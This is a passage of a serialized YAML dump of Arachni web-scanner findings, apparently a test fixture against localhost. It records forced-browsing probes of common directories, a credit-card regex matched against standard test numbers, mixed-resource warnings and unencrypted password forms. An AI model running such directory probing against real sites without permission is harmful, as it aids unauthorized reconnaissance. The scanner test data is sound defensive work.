!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/~log/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/~log/
injected: ~log
id: ~log
elem: path
remarks: {}
method: ''
response: ~log
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/error_log/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/error_log/
injected: error_log
id: error_log
elem: path
remarks: {}
method: ''
response: error_log
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/ccbill/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/ccbill/
injected: ccbill
id: ccbill
elem: path
remarks: {}
method: ''
response: ccbill
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/network/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/network/
injected: network
id: network
elem: path
remarks: {}
method: ''
response: network
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/xamp/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/xamp/
injected: xamp
id: xamp
elem: path
remarks:
:stuff:
- Blah
- Blah2
method: ''
response: xamp
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/xampp/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/xampp/
injected: xampp
id: xampp
elem: path
remarks: {}
method: ''
response: xampp
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/lamp/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/lamp/
injected: lamp
id: lamp
elem: path
remarks:
:stuff:
- Blah
- Blah2
method: ''
response: lamp
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
Wikipedia - Bank card number: http://en.wikipedia.org/wiki/Bank_card_number
Wikipedia - Luhn algorithm: http://en.wikipedia.org/wiki/Luhn_algorithm
Luhn Ruby implementation: https://gist.github.com/1182499
var:
url: http://localhost:12726/discover
elem: body
method: GET
name: Credit card number disclosure
description: A credit card number is disclosed in the body of the page.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Medium
remedy_guidance: Remove credit card numbers from the body of the HTML pages.
mod_name: Credit card number disclosure
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Wikipedia - Bank card number: http://en.wikipedia.org/wiki/Bank_card_number
Wikipedia - Luhn algorithm: http://en.wikipedia.org/wiki/Luhn_algorithm
Luhn Ruby implementation: https://gist.github.com/1182499
opts:
:regexp: (?-mix:\b(((4\d{3})|(5[1-5]\d{2})|(6011))[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}|3[4,7][\d\s-]{15})\b)
:match: '6011111111111117'
:element: body
var:
url: http://localhost:12726/discover
injected:
id:
regexp: (?-mix:\b(((4\d{3})|(5[1-5]\d{2})|(6011))[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}|3[4,7][\d\s-]{15})\b)
regexp_match: '6011111111111117'
elem: body
remarks: {}
method: GET
response: '6011111111111117'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozMSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Credit card number disclosure
description: A credit card number is disclosed in the body of the page.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Medium
remedy_guidance: Remove credit card numbers from the body of the HTML pages.
mod_name: Credit card number disclosure
variations: []
internal_modname: CreditCards
internal_modname: CreditCards
- !ruby/object:Arachni::Issue
verification: false
references:
Wikipedia - Bank card number: http://en.wikipedia.org/wiki/Bank_card_number
Wikipedia - Luhn algorithm: http://en.wikipedia.org/wiki/Luhn_algorithm
Luhn Ruby implementation: https://gist.github.com/1182499
var:
url: http://localhost:12726/master
elem: body
method: GET
name: Credit card number disclosure
description: A credit card number is disclosed in the body of the page.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Medium
remedy_guidance: Remove credit card numbers from the body of the HTML pages.
mod_name: Credit card number disclosure
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Wikipedia - Bank card number: http://en.wikipedia.org/wiki/Bank_card_number
Wikipedia - Luhn algorithm: http://en.wikipedia.org/wiki/Luhn_algorithm
Luhn Ruby implementation: https://gist.github.com/1182499
opts:
:regexp: (?-mix:\b(((4\d{3})|(5[1-5]\d{2})|(6011))[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}|3[4,7][\d\s-]{15})\b)
:match: '5555555555554444'
:element: body
var:
url: http://localhost:12726/master
injected:
id:
regexp: (?-mix:\b(((4\d{3})|(5[1-5]\d{2})|(6011))[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}|3[4,7][\d\s-]{15})\b)
regexp_match: '5555555555554444'
elem: body
remarks: {}
method: GET
response: '5555555555554444'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozMSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Credit card number disclosure
description: A credit card number is disclosed in the body of the page.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Medium
remedy_guidance: Remove credit card numbers from the body of the HTML pages.
mod_name: Credit card number disclosure
variations: []
internal_modname: CreditCards
internal_modname: CreditCards
- !ruby/object:Arachni::Issue
verification: false
references:
Wikipedia - Bank card number: http://en.wikipedia.org/wiki/Bank_card_number
Wikipedia - Luhn algorithm: http://en.wikipedia.org/wiki/Luhn_algorithm
Luhn Ruby implementation: https://gist.github.com/1182499
var:
url: http://localhost:12726/visa
elem: body
method: GET
name: Credit card number disclosure
description: A credit card number is disclosed in the body of the page.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Medium
remedy_guidance: Remove credit card numbers from the body of the HTML pages.
mod_name: Credit card number disclosure
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Wikipedia - Bank card number: http://en.wikipedia.org/wiki/Bank_card_number
Wikipedia - Luhn algorithm: http://en.wikipedia.org/wiki/Luhn_algorithm
Luhn Ruby implementation: https://gist.github.com/1182499
opts:
:regexp: (?-mix:\b(((4\d{3})|(5[1-5]\d{2})|(6011))[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}|3[4,7][\d\s-]{15})\b)
:match: '4111111111111111'
:element: body
var:
url: http://localhost:12726/visa
injected:
id:
regexp: (?-mix:\b(((4\d{3})|(5[1-5]\d{2})|(6011))[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}|3[4,7][\d\s-]{15})\b)
regexp_match: '4111111111111111'
elem: body
remarks: {}
method: GET
response: '4111111111111111'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozMSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Credit card number disclosure
description: A credit card number is disclosed in the body of the page.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Medium
remedy_guidance: Remove credit card numbers from the body of the HTML pages.
mod_name: Credit card number disclosure
variations: []
internal_modname: CreditCards
internal_modname: CreditCards
- !ruby/object:Arachni::Issue
verification: false
references:
Google Online Security Blog: http://googleonlinesecurity.blogspot.com/2011/06/trying-to-end-mixed-scripting.html
var:
url: https://localhost:10557/vuln_script
elem: body
method: GET
name: Mixed Resource
description: ! "Serving resources over an unencrypted channel\n while the HTML
code is served over HTTPS can lead to\n Man-In-The-Middle attacks and provide
a false sense of security."
tags:
- unencrypted
- resource
- javascript
- stylesheet
severity: Medium
remedy_guidance: Configure the server to serve all resources over the encrypted
channel.
mod_name: Mixed Resource
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Google Online Security Blog: http://googleonlinesecurity.blogspot.com/2011/06/trying-to-end-mixed-scripting.html
opts:
:regexp: !binary |-
aHR0cDovL2xvY2FsaG9zdC9zdHVmZi5qcw==
:match: http://localhost/stuff.js
:element: body
var:
url: https://localhost:10557/vuln_script
injected:
id:
regexp: http://localhost/stuff.js
regexp_match: http://localhost/stuff.js
elem: body
remarks: {}
method: GET
response: ! '
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NjI=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KSBPcGVuU1NM
LzEuMC4xYw==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Mixed Resource
description: ! "Serving resources over an unencrypted channel\n while the HTML
code is served over HTTPS can lead to\n Man-In-The-Middle attacks and provide
a false sense of security."
tags:
- unencrypted
- resource
- javascript
- stylesheet
severity: Medium
remedy_guidance: Configure the server to serve all resources over the encrypted
channel.
mod_name: Mixed Resource
variations: []
internal_modname: MixedResource
internal_modname: MixedResource
- !ruby/object:Arachni::Issue
verification: false
references:
Google Online Security Blog: http://googleonlinesecurity.blogspot.com/2011/06/trying-to-end-mixed-scripting.html
var:
url: https://localhost:10557/vuln_link
elem: body
method: GET
name: Mixed Resource
description: ! "Serving resources over an unencrypted channel\n while the HTML
code is served over HTTPS can lead to\n Man-In-The-Middle attacks and provide
a false sense of security."
tags:
- unencrypted
- resource
- javascript
- stylesheet
severity: Medium
remedy_guidance: Configure the server to serve all resources over the encrypted
channel.
mod_name: Mixed Resource
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Google Online Security Blog: http://googleonlinesecurity.blogspot.com/2011/06/trying-to-end-mixed-scripting.html
opts:
:regexp: !binary |-
aHR0cDovL2xvY2FsaG9zdC90aGVtZS5jc3M=
:match: http://localhost/theme.css
:element: body
var:
url: https://localhost:10557/vuln_link
injected:
id:
regexp: http://localhost/theme.css
regexp_match: http://localhost/theme.css
elem: body
remarks: {}
method: GET
response: ! '
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
ODg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KSBPcGVuU1NM
LzEuMC4xYw==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Mixed Resource
description: ! "Serving resources over an unencrypted channel\n while the HTML
code is served over HTTPS can lead to\n Man-In-The-Middle attacks and provide
a false sense of security."
tags:
- unencrypted
- resource
- javascript
- stylesheet
severity: Medium
remedy_guidance: Configure the server to serve all resources over the encrypted
channel.
mod_name: Mixed Resource
variations: []
internal_modname: MixedResource
internal_modname: MixedResource
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A9-Insufficient_Transport_Layer_Protection
var: insecure
url: http://localhost:11399/insecure
elem: form
method: GET
name: Unencrypted password form
description: Transmission of password does not use an encrypted channel.
tags:
- unencrypted
- password
- form
cwe: '319'
cwe_url: http://cwe.mitre.org/data/definitions/319.html
severity: Medium
remedy_guidance: Forms with sensitive content, like passwords, must be sent over
HTTPS.
mod_name: Unencrypted password forms
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A9-Insufficient_Transport_Layer_Protection
opts:
:var: !binary |-
aW5zZWN1cmU=
:match: ! ""
:element: form
:regexp: ''
var: insecure
url: http://localhost:11399/insecure
injected:
id:
regexp: ''
regexp_match: ! ""
elem: form
remarks: {}
method: GET
response: ! " \n\n \n\n Will be ignored.\n \n"
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjY2
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0MSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Unencrypted password form
description: Transmission of password does not use an encrypted channel.
tags:
- unencrypted
- password
- form
cwe: '319'
cwe_url: http://cwe.mitre.org/data/definitions/319.html
severity: Medium
remedy_guidance: Forms with sensitive content, like passwords, must be sent over
HTTPS.
mod_name: Unencrypted password forms
variations: []
internal_modname: UnencryptedPasswordForms
internal_modname: UnencryptedPasswordForms
- !ruby/object:Arachni::Issue
verification: false
references:
